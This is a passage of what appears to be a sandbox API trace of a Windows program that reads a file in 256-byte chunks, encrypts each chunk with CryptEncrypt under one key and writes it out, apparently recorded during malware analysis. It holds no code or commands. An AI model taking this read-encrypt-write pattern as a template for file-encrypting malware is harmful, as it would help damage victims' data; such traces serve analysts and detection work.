dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.100] GetLastError () returned 0x0 [0167.100] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.100] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.100] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.100] GetLastError () returned 0x0 [0167.100] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.101] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.101] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.101] GetLastError () returned 0x0 [0167.101] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.101] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.101] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.101] GetLastError () returned 0x0 [0167.101] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.101] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.101] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.102] GetLastError () returned 0x0 [0167.102] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.102] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.102] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.102] GetLastError () returned 0x0 [0167.102] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.102] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.102] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.102] GetLastError () returned 0x0 [0167.102] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.102] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.102] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.102] GetLastError () returned 0x0 [0167.102] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.102] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.102] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.102] GetLastError () returned 0x0 [0167.102] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.102] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.102] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.102] GetLastError () returned 0x0 [0167.102] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.102] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.102] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.102] GetLastError () returned 0x0 [0167.102] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.102] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.103] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.103] GetLastError () returned 0x0 [0167.103] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.103] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.103] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.103] GetLastError () returned 0x0 [0167.103] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.103] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.103] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.103] GetLastError () returned 0x0 [0167.103] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.103] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.103] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.103] GetLastError () returned 0x0 [0167.103] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.103] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.103] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.103] GetLastError () returned 0x0 [0167.103] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.103] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.103] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.103] GetLastError () returned 0x0 [0167.103] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.103] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.104] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.104] GetLastError () returned 0x0 [0167.104] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.104] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.104] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.104] GetLastError () returned 0x0 [0167.104] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.104] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.104] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.104] GetLastError () returned 0x0 [0167.104] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.104] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.104] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.104] GetLastError () returned 0x0 [0167.104] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.104] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.104] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.104] GetLastError () returned 0x0 [0167.104] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.104] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.104] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.104] GetLastError () returned 0x0 [0167.104] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.104] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.104] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.105] GetLastError () returned 0x0 [0167.105] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.105] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.105] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.105] GetLastError () returned 0x0 [0167.105] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.105] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.105] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.105] GetLastError () returned 0x0 [0167.105] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.105] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.105] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.105] GetLastError () returned 0x0 [0167.105] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.105] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.105] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.105] GetLastError () returned 0x0 [0167.105] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.105] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.105] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.105] GetLastError () returned 0x0 [0167.105] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.105] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.105] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.105] GetLastError () returned 0x0 [0167.105] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.105] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.106] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.106] GetLastError () returned 0x0 [0167.106] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.106] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.106] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.106] GetLastError () returned 0x0 [0167.106] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.106] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.106] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, 